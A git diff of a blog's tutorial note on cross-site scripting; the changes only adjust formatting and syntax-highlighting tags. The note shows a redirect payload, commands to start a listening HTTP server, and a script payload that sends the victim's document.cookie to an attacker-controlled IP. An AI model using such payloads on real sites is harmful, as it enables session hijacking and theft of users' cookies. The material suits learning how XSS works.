--- a/_posts/notes/web/2021-12-12-xss.md
+++ b/_posts/notes/web/2021-12-12-xss.md
@@ -1,38 +1,37 @@
 ---
 layout: post
 title: 'Notes | XSS'
-date: 2021-12-12
 permalink: /notes/web/xss/
 ---
 
 
-# [](#header-4)General
+# General
 
 If we have a form we can try to insert code, like this:
-{% highlight plain %}
+{% highlight html %}
 <script> ... </script>
 {% endhighlight %}
 If the page execute what are in the form we can make several damage to the page.
 
 There are some examples:
-{% highlight plain %}
+{% highlight html %}
 <script> window.location="" </script>
 {% endhighlight %}
 This will send the target to a different page (phishing).
 
 Also, if we use **deface** we can send a visitor to another part of the webpage. This can break the whole page.
 
-# [](#header-4)Blind XSS
+# Blind XSS
 We can use XSS to a cookie hijacking. First we need to start an http server, we can do it with python...:
-{% highlight plain %}
+{% highlight bash %}
 > python -m http.server 80
 {% endhighlight %}
 or php...:
-{% highlight plain %}
+{% highlight bash %}
 > php -S 0.0.0.0:80
 {% endhighlight %}
 
 Then we send others cookie to our http server:
-{% highlight plain %}
+{% highlight html %}
 <script>document.write('<img src="http://192.168.0.2:80/xss.png?cookie='+ document.cookie + "')</script>
 {% endhighlight %}
